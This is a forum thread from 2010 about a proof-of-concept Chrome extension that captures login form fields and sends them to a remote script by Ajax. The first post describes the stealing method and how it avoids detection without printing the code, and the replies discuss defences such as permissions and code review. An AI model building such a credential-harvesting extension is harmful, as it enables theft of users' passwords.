Welcome guest, is this your first visit? Create Account now to join.
Page 1 of 2 12 LastLast
Results 1 to 10 of 16

This is a discussion on Proof of Concept - Google Chrome login get HACK within the Bugs and Vulnerabilities section, part of the Google Chrome category: Friday, July 9, 2010 Stealing login details with a Google Chrome extension In this post I will demonstrate a proof ...


  1. #1
    Wacky_Sung is offline Junior Member
    Join Date
    Apr 2010
    Posts
    22

    Exclamation Proof of Concept - Google Chrome login get HACK

    Friday, July 9, 2010
    Stealing login details with a Google Chrome extension
    In this post I will demonstrate a proof of concept of how an attacker can steal usernames and passwords via a Google Chrome Extension.


    The Google Chrome browser allows the installation of third-party extensions that are used to extend the browser to add new features. The extensions are written in JavaScript and HTML and allow manipulation of the DOM, amongst other features.

    By allowing access to the DOM, an attacker can thus read form fields...including username and password fields. This is what sparked my idea of creating this PoC.



    The extension I present here is very simple. Whenever a user submits a form, it tries to capture the username and password fields, sends me an email via an Ajax call to a script with these login details along with the url and then proceeds to submit the form normally as to avoid detection.

    This simple procedure has been successful against Gmail, Facebook, Twitter and other major websites.

    http://blog.dreasgrech.com/2010/07/s...th-google.html

  2. #2
    Waha's Avatar
    Waha is offline Senior Member
    Join Date
    Apr 2009
    Location
    Oregon
    Posts
    788

    Default

    Yeah, never gonna be patched though, too limiting. This is why Chrome warns you about what sites the extension wants permission to.
    After all, the one unpatchable security hole is human stupidity.
    ~ Projects ~
    Specialized: Carapass Auction Watcher, Kongregate Chat
    Libraries: bliplib
    Tools: manifest syntax highlighting & snippits
    ~ Happy to make extensions for pay too ;D ~
    Portfolio: Search and Share

  3. #3
    vasa1 is offline Senior Member
    Join Date
    Jun 2010
    Posts
    101

    Default

    I assume that extensions that are on the official Google site are vetted and that the concern/PoC is relevant to unofficial extensions, that is, if the screeners at Google do a good job.

    I don't know whether what I'm asking makes sense but here goes... Since javascript and html are relatively easy to look at, can there be a sort of parser for idiots that could look at a script or html code and summarise the activity even in broad terms.

    Waha wrote:
    This is why Chrome warns you about what sites the extension wants permission to
    From the few extensions I used, it appears that the warning is very general to the effect that the extension requires total access to your computer. That causes a lot of people to freak out!

    (I guess even ordinary users with a little experience can spot a dodgy url if they know where to look in the unzipped extension.)

    in edit:
    I just looked that the code provided in the OP's message and I have a newbie question:
    nowhere in the code is the author's e-mail address mentioned, even fictionally. The closest that one gets is "SendMail". So how can the browser convey our details to the author?
    Last edited by vasa1; 07-11-2010 at 03:28 AM.
    Latest stable on WinXP

  4. #4
    PAEz's Avatar
    PAEz is offline Moderator
    Join Date
    Aug 2009
    Location
    Australia
    Posts
    656

    Default

    I assume that extensions that are on the official Google site are vetted and that the concern/PoC is relevant to unofficial extensions, that is, if the screeners at Google do a good job.
    From my understanding they only actually review things that use the file:// protocol or a plugin, other stuff just gets put on straight away.
    I don't know whether what I'm asking makes sense but here goes... Since javascript and html are relatively easy to look at, can there be a sort of parser for idiots that could look at a script or html code and summarise the activity even in broad terms.
    This would take a huge amount of work trying to cater for all the different ways this could be done and a nasty could hide their activities as well if there was such a thing. Youd basically need an antivirus like thing and it would take alot to do.
    From the few extensions I used, it appears that the warning is very general to the effect that the extension requires total access to your computer. That causes a lot of people to freak out!
    Yeah, you either freak out and dont install it or you just get so used to it you end up saying yes to everything.
    The best defense you have against this sort of thing is other users and the comment section of the extension page. There would be alot of users like me that look at the code of almost everything they install. I look at code for something to do and if I noticed something odd like sending an ajax when it didnt need to Id post a comment and so would others. One of the big reasons I love chrome so much is because of how easy their extension system is, unlike firefox which can confuse the hell out of me chromes extensions are easy to read.
    in edit:
    I just looked that the code provided in the OP's message and I have a newbie question:
    nowhere in the code is the author's e-mail address mentioned, even fictionally. The closest that one gets is "SendMail". So how can the browser convey our details to the author?
    The SendMail sends the information to a server that then sends an email to him.

  5. #5
    vasa1 is offline Senior Member
    Join Date
    Jun 2010
    Posts
    101

    Default

    Quote Originally Posted by PAEz View Post
    ...The best defense you have against this sort of thing is other users and the comment section of the extension page...
    That is true and the easiest for us end-users.
    Latest stable on WinXP

  6. #6
    Wacky_Sung is offline Junior Member
    Join Date
    Apr 2010
    Posts
    22

    Default

    Personally prior to this proof of concept of what i have posted, i just find that google chrome browser shall has a master password manager just like firefox.I dislike google chorum lacking of this security feature.Indeed installing a proper extension has been never been an easy just as firefox has even reported their own addon got a trojan in which they has missed.

    http://www.zdnet.com/blog/hardware/u...ojan-code/7171

    The best security is zero extension / addon.

  7. #7
    PAEz's Avatar
    PAEz is offline Moderator
    Join Date
    Aug 2009
    Location
    Australia
    Posts
    656

    Default

    The best security is zero extension / addon.
    Which is why chrome has incognito mode and extensions are not enabled in this mode by default. If you want an extension to run in incognito mode you have to explicitly enable it too on the extensions page.
    So the utterly paranoid are still best off in Chrome.

  8. #8
    Bloody_Turds is offline Senior Member
    Join Date
    Aug 2009
    Posts
    152

    Default

    chrome still could give a seperate set of permissions, to record, the name, and password fields, along with certain other fields (creditcard cough), or even prompt when the reading of secure happens (allowing chrome to stop the extension in its tracks, or allow it to carry on)

  9. #9
    PAEz's Avatar
    PAEz is offline Moderator
    Join Date
    Aug 2009
    Location
    Australia
    Posts
    656

    Default

    chrome still could give a seperate set of permissions, to record, the name, and password fields, along with certain other fields (creditcard cough
    Name and credit card might be a hassle, but password elements are distinct and so they could do a permission for that for sure....would make sense....plus maybe restrict the reading of input elements on https pages

  10. #10
    vasa1 is offline Senior Member
    Join Date
    Jun 2010
    Posts
    101

    Default

    Apparently, something similar has been yanked from the official Mozilla site:
    http://blog.mozilla.com/addons/2010/...-announcement/
    The actual author of the PoC in the original post in this thread has appended a comment on that blog.
    Latest stable on WinXP

Page 1 of 2 12 LastLast

Similar Threads

  1. Thank you hack
    By sulasno in forum Chrome Central
    Replies: 5
    Last Post: 05-16-2010, 09:50 PM
  2. Password is being shown during login
    By nandwana_vikas in forum Chrome Troubleshooting
    Replies: 0
    Last Post: 10-22-2009, 06:30 AM
  3. Proof of Concept: Saving extenion's options via cookie
    By Waha in forum Plugins Development
    Replies: 13
    Last Post: 07-08-2009, 10:44 PM
  4. Chrome Plugins concept logo
    By Stamga in forum General Chat
    Replies: 13
    Last Post: 06-07-2009, 01:25 PM
  5. Login Boxes display differently in chrome and safari
    By christop049 in forum Chrome Troubleshooting
    Replies: 3
    Last Post: 06-04-2009, 01:10 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •